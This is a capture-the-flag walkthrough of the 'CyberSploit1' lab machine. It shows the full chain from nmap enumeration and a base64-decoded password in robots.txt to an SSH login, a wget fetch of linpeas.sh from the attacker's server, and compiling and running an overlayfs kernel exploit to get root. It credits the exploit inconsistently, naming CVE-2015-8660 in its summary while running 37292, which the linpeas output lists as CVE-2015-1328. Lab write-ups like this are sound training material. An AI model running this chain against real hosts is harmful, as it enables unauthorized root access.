Proving Grounds Play: CyberSploit1 Walkthourgh
In this writeup, we’ll explore the steps taken to conquer a Capture The Flag (CTF) challenge, highlighting the process from initial enumeration to privilege escalation.
Enumeration Phase: Upon conducting an initial Nmap scan, two open ports were identified on the target machine: SSH on port 22 and HTTP on port 80. Further investigation revealed the presence of a web page, which led to the discovery of a username: “itsskv.”
Web Enumeration: After extensively searching the web directories, the most notable finding was the “robots.txt” file. Within this file, an encoded string was uncovered, which, when decoded, revealed the password: “cybersploit{youtube.com/c/cybersploit}.” Armed with both the username and password, an SSH connection was established successfully.
Privilege Escalation: Upon gaining access to the target system, initial enumeration revealed a lack of sudo privileges for the current user. The next step involved transferring the “linpeas.sh” script from the attacker’s machine to the victim’s machine. This was accomplished by setting up a Python server on the attacker’s side and using “wget” on the victim’s side to retrieve the script. The script was then made executable and run, revealing a vulnerability in the kernel version related to overlayfs (CVE-2015–8660).
Exploitation and Privilege Escalation: Taking advantage of the identified vulnerability, an appropriate exploit from the Exploit Database (CVE-2015–8660) was selected, compiled, and executed. This resulted in successful privilege escalation to root, granting full administrative access to the target machine.
Let’s start with the first things first run an nmap scan to see what ports are open and what services are running on these ports.
Nmap scan report for 192.168.173.92
Host is up (0.15s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
| 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
1272/tcp filtered cspmlockmgr
2700/tcp filtered tqdata
3098/tcp filtered umm-port
9951/tcp filtered apc-9951
14733/tcp filtered unknown
39439/tcp filtered unknown
39648/tcp filtered unknown
50435/tcp filtered unknown
62127/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.86 secondsSo there are two ports open 22 SSH and 80 HTTP. Let’s enumerate the web page first.
Let’s check the source of the site found nothing useful features on the web.
We got the username:itsskv Now let’s dig deeper in the website, Fuzz the directories.
I have found lots of directory, I have visited almost every directory. But nothing found interesting expect robots.txt.
There is something which is base 64 encoded. Let’s decode an see what it is.
echo -n “Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=” | base64 -d
cybersploit{youtube.com/c/cybersploit}
This is most probably the password cybersploit{youtube.com/c/cybersploit}. As far now we have the password and username of the box, Let’s try to get ssh into the box.
ssh itsskv@192.168.173.92
ssh itsskv@cybersploit
itsskv@cybersploit's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
itsskv@cybersploit-CTF:~$ We got in, Now let’s submit the local flag. And move to the privilege escalation part. As far this user is not in the sudoers file. So I have transferred linpeas.sh to the victim machine. For this we have to set up a python server on attacker machine and then download it to victim an run it.
Attacker Machine:
python3 -m http.server 80
Victim machine:
wget http://vpn-ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.shNow run the linpeas script and after running it , I have seen that this kernel version is vulnerable to overlayfs cve.
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
Source: http://www.exploit-db.com/exploits/39230
[3] pp_key
CVE-2016-0728
Source: http://www.exploit-db.com/exploits/39277
[4] timeoutpwn
CVE-2014-0038
Source: http://www.exploit-db.com/exploits/31346
[+] [CVE-2015-1328] overlayfs
Details: http://seclists.org/oss-sec/2015/q2/717
Exposure: highly probable
Tags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Download URL: https://www.exploit-db.com/download/37292I have tried http://www.exploit-db.com/exploits/37292 this exploit and it worked.
itsskv@cybersploit-CTF:~$ gcc 37292.c -o exploit
itsskv@cybersploit-CTF:~$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(itsskv)We have rooted the box. Stay tuned for next write up.
